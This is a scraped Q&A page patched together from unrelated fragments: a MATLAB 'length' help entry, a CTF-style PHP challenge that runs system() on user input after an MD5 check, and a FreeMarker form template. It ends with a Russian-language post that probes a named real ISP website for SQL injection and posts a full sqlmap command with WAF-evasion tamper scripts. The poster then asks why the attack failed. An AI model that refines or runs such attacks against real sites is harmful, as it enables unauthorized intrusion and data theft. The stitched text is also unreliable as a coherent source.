help length

本文介绍了一种计算向量长度的方法,使用length函数可以方便地获取向量的长度。对于非空数组,该函数等价于求SIZE的最大值;而对于空数组,则返回0。
help length

 length   Length of vector.
    length(X) returns the length of vector X.  It is equivalent
    to MAX(SIZE(X)) for non-empty arrays and 0 for empty ones.
HTTP/1.1 200 OK Date: Sun, 14 Sep 2025 04:39:51 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.29 Vary: Accept-Encoding Content-Length: 4918 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <code><span style="color: #000000"> <span style="color: #0000BB"><?php <br />show_source</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">); <br /></span><span style="color: #FF8000">//./flag.txt <br /></span><span style="color: #0000BB">error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">); <br />function </span><span style="color: #0000BB">validation_check</span><span style="color: #007700">() { <br />    </span><span style="color: #0000BB">$a </span><span style="color: #007700">= @</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'a'</span><span style="color: #007700">]; <br />    </span><span style="color: #0000BB">$b </span><span style="color: #007700">= @</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'b'</span><span style="color: #007700">]; <br />    </span><span style="color: #0000BB">$c </span><span style="color: #007700">= @</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'c'</span><span style="color: #007700">]; <br />    if (</span><span style="color: #0000BB">$a </span><span style="color: #007700">!== </span><span style="color: #0000BB">$b </span><span style="color: #007700">&& </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">) === </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$b</span><span style="color: #007700">)) { <br />        if (</span><span style="color: #0000BB">$c </span><span style="color: #007700">== </span><span style="color: #0000BB">0 </span><span style="color: #007700">&& </span><span style="color: #0000BB">$c</span><span style="color: #007700">) { <br />            return </span><span style="color: #0000BB">true</span><span style="color: #007700">; <br />    } <br />    return </span><span style="color: #0000BB">false</span><span style="color: #007700">; <br />} <br />} <br />function </span><span style="color: #0000BB">command_execution</span><span style="color: #007700">() { <br />    if (!isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">])) { <br />        die(</span><span style="color: #DD0000">"Where is cmd?"</span><span style="color: #007700">); <br />    } <br />     <br />    </span><span style="color: #0000BB">$command </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">]; <br />    </span><span style="color: #0000BB">execute_command</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">); <br />} <br />function </span><span style="color: #0000BB">execute_command</span><span style="color: #007700">(</span><span style="color: #0000BB">$input</span><span style="color: #007700">) { <br />    if (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$input</span><span style="color: #007700">) > </span><span style="color: #0000BB">4</span><span style="color: #007700">) { <br />        die(</span><span style="color: #DD0000">"too long!"</span><span style="color: #007700">); <br />    } <br />    </span><span style="color: #0000BB">system</span><span style="color: #007700">(</span><span style="color: #0000BB">$input</span><span style="color: #007700">); <br />} <br />if (</span><span style="color: #0000BB">validation_check</span><span style="color: #007700">()) { <br />    </span><span style="color: #0000BB">command_execution</span><span style="color: #007700">(); <br />} else { <br />    die(</span><span style="color: #DD0000">"NoNoNo"</span><span style="color: #007700">); <br />}</span> </span> </code>NoNoNo
09-15
请详细分析下面代码: <#import "/decorators/includes/macros.ftl" as m> <#assign ww = JspTaglibs["/WEB-INF/webwork.tld"] /> <#include "/template/includes/actionerrors.ftl"> <script> xmlParse = new function(){ this.xmlDoc = null; this.parse=function(response){ this.xmlDoc = response.responseXML.documentElement; } //取得所有节点 this.getRows=function(_xpath){ return this.xmlDoc.selectNodes(_xpath); } //取得单个节点 this.getRow=function(_xpath){ return this.xmlDoc.selectSingleNode(_xpath); } //取得单个节点的文本值 this.getRowValue=function(_xpath){ return this.xmlDoc.selectSingleNode(_xpath).text; } //取得属性值 this.getRowAttribute=function(_rowItem,attr){ var xpath="@"+attr; return _rowItem.selectSingleNode(xpath).text; } } function checkRuncardStatus(){ var url ="checkFormData.action"; var ajaxRequest = new Ajax.Request( url,{ method: 'post', asynchronous: 'false', parameters: $('requestFormId').serialize(), onComplete: function(transport){ //alert(transport.responseText); xmlParse.parse(transport); var status =xmlParse.getRows("/roots/status"); var flag=status[0].getAttribute("value"); //alert(xmlParse.getRowValue("/roots/status")); if(flag=="nodraft"){ alert("This runcard had been issued, don't click the button of back off in the browser.\n\n Please apply new application !"); } }}); } function checkPageToPreview(){ var form = document.forms['updateRequestForm']; var holdStepNo=form.elements["requestForm.holdStepNo"]; var ercStepNo=form.elements["requestForm.ercStepNo"]; var holdStepNoMes=form.elements["requestForm.holdStepNoMes"]; var ercStepNoMes=form.elements["requestForm.ercStepNoMes"]; clearHoldLotInfo(holdStepNo); clearCompleteLotInfo(ercStepNo); /* remove the Lot Type check. var lotType="${requestForm.lotType?default('')?if_exists}"; var runcardCategory=$F("requestForm.ercCategory"); if(lotType=="P" | lotType=="R" | lotType=="M" |lotType=="B" |lotType=="E1" |lotType=="E2"|lotType=="E3" |lotType=="E9"){ if(runcardCategory!="Input the STR Number" && runcardCategory!="STR" && runcardCategory!="MSTR" ) { alert("Because the lotType is "+lotType+ ". Please select 'the For STR/MSTR lots(Pls input the effective STR or MSTR number)' in RunCard Category, and input the STR# ! "); $("requestForm.ercCategory").focus(); return false; } }*/ if (typeof form.elements["requestForm.lotId"]!= "undefined"){ var element = form.elements["requestForm.lotId"].value; if (element==""){ alert("The Lot field can not be null"); form.elements["requestForm.lotId"].focus(); return false; } } if (typeof form.elements["requestForm.ercRunMode"]!= "undefined"){ if (!form["requestForm.ercRunMode"][0].checked&&!form["requestForm.ercRunMode"][1].checked){ alert("Please choose the Runcard's Follow mode after Runcard completed!"); return false; } } if (typeof form.elements["requestForm.needCheck"]!= "undefined"){ if (!form["requestForm.needCheck"][0].checked&&!form["requestForm.needCheck"][1].checked){ alert("Please choose the check RunCard's Product Id method!"); return false; } } if (typeof form.elements["requestForm.holdStepNo"]!= "undefined"){ var element = form.elements["requestForm.holdStepNo"].value; if (element==""){ alert("The Hold Step No field can not be null"); form.elements["requestForm.holdStepNo"].focus(); return false; } var elementMes = form.elements["requestForm.holdStepNoMes"].value; if (elementMes==null || element!=elementMes){ alert("Please click [go] to get MES information."); form.elements["requestForm.holdStepNo"].focus(); return false; } } if (typeof form.elements["requestForm.holdStepNo"]!= "undefined"){ var element = form.elements["requestForm.holdStepNo"].value; if (element==""){ alert("The Hold Step No field can not be null"); form.elements["requestForm.holdStepNo"].focus(); return false; } } if (typeof form.elements["requestForm.relatedModlue"]!= "undefined"){ var element = form.elements["requestForm.relatedModlue"].value; if (element==""){ alert("You must select related module manager to sign runcard"); form.elements["requestForm.relatedModlue"].focus(); return false; } } if (typeof form.elements["requestForm.E1Mgr"]!= "undefined"){ var element = form.elements["requestForm.E1Mgr"].value; if (element==""){ alert("You must select E1 manager to sign runcard"); form.elements["requestForm.E1Mgr"].focus(); return false; } } if (typeof form.elements["requestForm.mfgMgr"]!= "undefined"){ var element = form.elements["requestForm.mfgMgr"].value; if (element==""){ alert("You must select MFG manager to sign runcard"); form.elements["requestForm.mfgMgr"].focus(); return false; } } if (typeof form.elements["requestForm.ercCategory"]!= "undefined"){ var element = form.elements["requestForm.ercCategory"].value; if (element=="Please Select"){ alert("You must select Runcard Category!"); form.elements["requestForm.ercCategory"].focus(); return false; } } if (typeof form.elements["requestForm.purpose"]!= "undefined"){ var element = form.elements["requestForm.purpose"].value; if(element.length>150){ alert("Remark最多150个字符!"); element.focus(); return false; } if (element==""){ alert("Purpose can not be null!"); form.elements["requestForm.purpose"].focus(); return false; } } if (typeof form.elements["requestForm.strEnNo"]!= "undefined"){ var element = form.elements["requestForm.strEnNo"].value; if (element==""){ if(form.elements["requestForm.ercCategory"].value=="For Customer Request") alert("EN#. can not be null!"); else alert("STR NO#. can not be null!"); form.elements["requestForm.strEnNo"].focus(); return false; } } if (typeof form.elements["requestForm.ercContamination"]!= "undefined"){ var element = form.elements["requestForm.ercContamination"].value; if (element=="Please Select"){ alert("Please select Lot Contamination Flag!"); form.elements["requestForm.ercContamination"].focus(); return false; } } if (typeof form.elements["requestForm.ercStepNo"]!= "undefined"){ var element = form.elements["requestForm.ercStepNo"].value; if (element==""){ alert("Step No#. can not be null!"); form.elements["requestForm.ercStepNo"].focus(); return false; } var elementMes = form.elements["requestForm.ercStepNoMes"].value; if (elementMes==null || element!=elementMes){ alert("Please click [go] to get MES information."); form.elements["requestForm.ercStepNo"].focus(); return false; } } if (typeof form.elements["requestForm.ercEngineerNo"]!= "undefined"){ var element = form.elements["requestForm.ercEngineerNo"].value; if (element==""){ alert("Engineer can not be null!"); form.elements["requestForm.ercEngineerNo"].focus(); return false; } } if (typeof form.elements["requestForm.ercEngineerTel"]!= "undefined"){ var element = form.elements["requestForm.ercEngineerTel"].value; if (element==""){ alert("Engineer Tel. can not be null!"); form.elements["requestForm.ercEngineerTel"].focus(); return false; } } <#if requestForm.formType=="Normal" || requestForm.formType=="Auto Reposition Step"> var wHeight=400; var wWidth=620; var wTop=(screen.height-wHeight)/2; var wLeft=(screen.width-wWidth)/2; var str=window.showModalDialog("stepCompareRule.action?requestFormId=${requestForm.id}","","dialogTop:"+wTop+"px; dialogLeft:"+wLeft+"px;dialogheight :"+wHeight+"px; dialogwidth :"+wWidth+"px; edge: Raised; center: Yes; help: No; resizable: No; status: No; scroll:Yes;"); if(str=="null" || str==undefined || str!="Yes"){ return false; } </#if> form.action="updateRequestForm.action"; form.submit(); } </script> <#if requestForm.status!="DRAFT"><div><font color="red">This runcard had been issued.If you want to apply the case,please click the new application.</font></div></#if> <#if requestForm.haveQtime?has_content><div><font color="red">This runcard information had been stored the MES.If you want to delete this runcard,please click the button(Prview and Cancel Runcard ).If you want to submit it,please click the button (Preview and Continue Runcard)</font></div></#if> <#if (requestForm.match)?default("")=="N"><div>Compare with MES Result:  <font color="red">Not match MES Info</font></div><#elseif (requestForm.match)?default("")=="Y"> <div>Compare with MES Result:  <font color="red">Match MES Info</font></div><#else><div>Compare with MES Result:  <font color="red">${requestForm.match?default("")}</font></div> </#if> <div class="app"> <h3>e-Runcard Request Form(${requestForm.formType?if_exists})</h3> <form name="updateRequestForm" action="updateRequestForm.action" namespace="/user" method="post"> <@ww.hidden name="'requestFormId'" value="${requestForm.id}"/> <@ww.hidden name="'requestForm.match'" value="'No Comparison'"/> <@ww.hidden name="'requestForm.compareResultComment'" value="''"/> <@ww.hidden name="'requestForm.holdStepNoMes'"/> <@ww.hidden name="'requestForm.ercStepNoMes'"/> <input type="hidden" name="paginationSupport.startIndex" value="0"/> <input type="hidden" name="paginationSupport.countOnEachPage" value="10"/> <table border="0" cellspacing="1" cellpadding="8" width="100%"> <tr class="b"> <td>RunCard No.:</td> <td>${requestForm.caseNo?if_exists}</td> <td>Status:</td> <td><font color="red">${requestForm.status?if_exists}</font></td> </tr> <tr class="b"> <td>Applicant:</td> <td><@m.directoryLink requestForm.applicant?if_exists/> </td> <td>Organization:</td> <td>${requestForm.applicantOrg?if_exists}</td> </tr> <tr class="b"> <td>Submit Date:</td> <td>${requestForm.submitDate?if_exists}</td> <td>Effective Date:</td> <td>${requestForm.effectiveDate?if_exists}</td> </tr> <#switch requestForm.formType> <#case "Auto Reposition Step"> <#include "includeLotInfo.ftl"/> <#include "includeSignInfo.ftl"/> <#include "includeErcHeaderInfo_reposition.ftl"/> <#include "includeErcCompleteInfo.ftl"/> </table> <#break> <#default> <#include "includeLotInfo.ftl"/> <#include "includeSignInfo.ftl"/> <#include "includeErcHeaderInfo.ftl"/> <#include "includeErcCompleteInfo.ftl"/> </table> <table border="0" cellspacing="1" cellpadding="8" width="100%"> <#assign showWGRbtn="true"/> <#include "includeStepInfo.ftl"/> </table> </#switch> <#if requestForm.lotCategory?exists> <table border="0" cellspacing="1" cellpadding="8" width="100%"> <tr><td><center><font color="#FF0000"><b>!!! Special lot, category is ${requestForm.lotCategory}, pls take care !!!</b></font></center></td></tr> </table> </#if> <hr/> <table width="100%"> <tr> <td class="center"> <!--input type="button" onclick="window.open('../stepForm/printRuncard.action?requestFormId=${requestForm.id}','','resizable=yes,scrollbars=yes,width=800,height=600')" value="Print"/-->     <input type="button" onclick="checkPageToPreview()" value="Preview"/> </td> </tr> </table> </form> </div>
最新发布
09-18
репорт: GET /ua/site/domains.php/1' HTTP/1.1 Host: www.skylinetele.com Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: __utma=28549694.77068547.1755355595.1755355595.1755355595.1; __utmc=28549694; __utmz=28549694.1755355595.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=28549694.1.10.1755355595 Upgrade-Insecure-Requests: 1 Referer: https://www.skylinetele.com/ Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138" Sec-CH-UA-Platform: "Windows" Sec-CH-UA-Mobile: ?0 Content-Length: 0 а вот ответ : HTTP/1.1 200 OK Date: Sat, 16 Aug 2025 14:47:56 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.6.40-1~dotdeb+7.1 Vary: Accept-Encoding Content-Length: 7179 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="copyright" content="© Skyline telecom 2012"> <meta name="keywords" content="интернет, телефония, хостинг, одесса, sip, сервера, передача данных"> <title>Скайлайн Телеком</title> <link rel="shortcut icon" href="https://skylinetele.com/favicon.ico"> <link rel="stylesheet" href="/styles.css" type="text/css"> <script src="/ckeditor/ckeditor.js"></script> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script> <script type="text/javascript"> $(document).ready(function(){ $('.spoiler_links').click(function(){ $(this).parent().children('div.spoiler_body').toggle('normal'); return false; }); }); </script> </head> <body bgcolor=#ffffff text=#000000 link=#000000 vlink=#000000 alink=#000000 leftmargin=15 topmargin=15 marginheight=15 marginwidth=15> <map name="hm"> <area shape="rect" coords="1,1,26,23" href="https://www.skylinetele.com" alt="Home" title="На головну"> <area shape="rect" coords="32,1,58,23" href="mailto:support@skylinetele.com" alt="Mail" title="Написати лист"> </map> <table align=left border=0 cellspacing=0 cellpadding=3 width=970 height=100% bgcolor=#ffffff id=ten> <tr> <td colspan=2 align=left valign=center height=120> <div style="float: right;"><b> <a href="https://skylinetele.com/ua" title="ua"><font color=#FF6600>ua</font></a> <font color=#FF6600>&nbsp|&nbsp</font> <a href="https://skylinetele.com/ru" title="ru"><font color=#FF6600>ru</font></a> &nbsp&nbsp&nbsp&nbsp <a href="https://stat.skylinetele.com" title="Для зареєстрованих користувачів"><font color=#FF6600>Вхід ↵</font></a></b>&nbsp</div> <div style="float: left;">&nbsp<img src="/img/hm.png" border="0" usemap="#hm"></div> <div style="float: left; width: 100%;"> <object type="application/x-shockwave-flash" data="https://skylinetele.com/img/logo.swf" width="400" height="74"> <param name="movie" value="https://skylinetele.com/img/logo.swf" /> <param name="menu" value="false" /> <img src="/img/st-logo-hor-eng-small.jpg" width="400" height="74" alt="Скайлайн Телеком" /> </object> </div> <div style="clear: both"></div> </td> </tr> <tr> <td width=200 valign=top> <table bgcolor="#FF6600" border="0" cellpadding="2" cellspacing="1" style="width:100%"> <tbody> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/">Новини</a></strong></td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/site/contract.html">Умови обслуговування</a></strong></td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/site/popolnenie.shtml">Як поповнити рахунок</a></strong></td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/site/services.shtml">Інтернет та передача даних</a></strong></td> </tr> <tr> <td bgcolor="#ffffff"> <p><a href="/ua/site/ll_tarif.shtml">Виділені лінії</a><br /> <a href="/ua/site/transport.shtml">Передача даних</a><br /> <a href="/ua/site/wifi.shtml">Бездротовий зв'язок</a><br /> <a href="/ua/site/tarif.shtml">Додаткові послуги</a></p> </td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/site/tele1.shtml">Телефонія </a></strong></td> </tr> <tr> <td bgcolor="#ffffff"> <p><a href="/ua/site/virtual_attendant.shtml"><span style="color:#F00E0E">Віртуальний секретар</span></a><br /> <a href="/ua/site/dostupniy-mir.shtml">Послуга "Доступний Світ"</a><br /> <a href="/ua/site/tele2.shtml">PRI-потік</a><br /> <a href="/ua/site/tele3.shtml">SIP</a><br /> <a href="/ua/site/tele4.shtml">Традиційна телефонія</a><br /> <a href="/ua/site/state.shtml">Як дізнатися про стан рахунку</a><br /> <!--<a href="/ua/site/popolnenie.shtml">Як поповнити рахунок</a><br />--> <a href="https://stat.skylinetele.com/bin/phcard" target="_blank"><strong>Поповнення рахунку</strong></a><br /> <a href="https://stat.skylinetele.com" target="_blank">Вхід для абонентів</a><br /> <a href="https://skylinetele.com/ua/site/quality-of-telecommunication-services.shtml">Якість телекомунікаційних послуг</a></p> </td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="https://skylinetele.com/ua/site/hosting.shtml">Хостинг та доменні імена</a></strong></td> </tr> <tr> <td bgcolor="#ffffff"><a href="https://www.host24.ua/hosting" target="_blank">Віртуальний хостинг</a><br /> <a href="https://www.host24.ua/colocation" target="_blank">Розміщення серверів</a><br /> <a href="/ua/site/domains.php">Реєстрація доменів</a><br /> <a href="/ua/site/document.php">Документація</a></td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/site/users.shtml">Користувачі</a></strong></td> </tr> <tr> <td bgcolor="#ffffff"><a href="https://stat.skylinetele.com" target="_blank">Вхід для користувачів</a></td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/site/help.shtml">Допомога</a></strong></td> </tr> <tr> <td bgcolor="#ffffff"> <p><a href="/ua/site/faq.shtml">Відповіді на запитання</a><br /> <a href="/ua/site/cards.shtml">Картки SkyCard</a><br /> <a href="/ua/site/shops.shtml">Де придбати картки</a></p> </td> </tr> <tr> <td bgcolor="#ffffff"><strong><a href="/ua/site/requisites.shtml">Контакти та реквізити</a></strong></td> </tr> </tbody> </table> <table width="100%"> <tbody> <tr> <td align="center" width="50%"><img alt="Mastercard" border="0" hspace="5" src="/img/mastercard.svg" vspace="5" width="50" /></td> <td align="center" width="50%"><img alt="Visa" border="0" hspace="5" src="/img/visa.svg" vspace="5" width="50" /></td> </tr> </tbody> </table> <table style="width:100%"> <tbody> <tr> <td colspan="2">ТОВ "Компанія "Скайлайн Телеком"</td> </tr> <tr> <td colspan="2">E-mail: <a href="mailto:support@skylinetele.com">support@skylinetele.com</a></td> </tr> <tr> <td colspan="2">телефон: +380 48 7972115</td> </tr> <tr> <td colspan="2">факс: +380 48 7972115</td> </tr> </tbody> </table> <p> </p> </td> <td valign=top width=770> <table border=0 cellspacing=1 cellpadding=2 width=100% bgcolor=#FF6600 id=ten> Invalid query :'SELECT * FROM site WHERE url='1'';' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 Я попробовал sqlmap : sqlmap -u "https://www.skylinetele.com/ua/site/domains.php?url=*" --random-agent --level=5 --risk=3 --tamper=space2comment,apostrophemask,between,randomcase,if2case,modsecurityversioned,space2randomblank,space2plus,versionedkeywords,charencode,equaltolike,charunicodeencode --dbms=mysql --technique=BEUST --time-sec=5 --delay=2 --batch -v 3 --ignore-code=403,404,400 --string="Скайлайн Телеком" --code=301 --dbs --force-ssl --no-cast --skip=Host,Referer и вот итог : [20:31:07] [WARNING] URI parameter '#1*' does not seem to be injectable [20:31:07] [CRITICAL] all tested parameters do not appear to be injectable. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. Где я допустил ошибку?
08-19
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值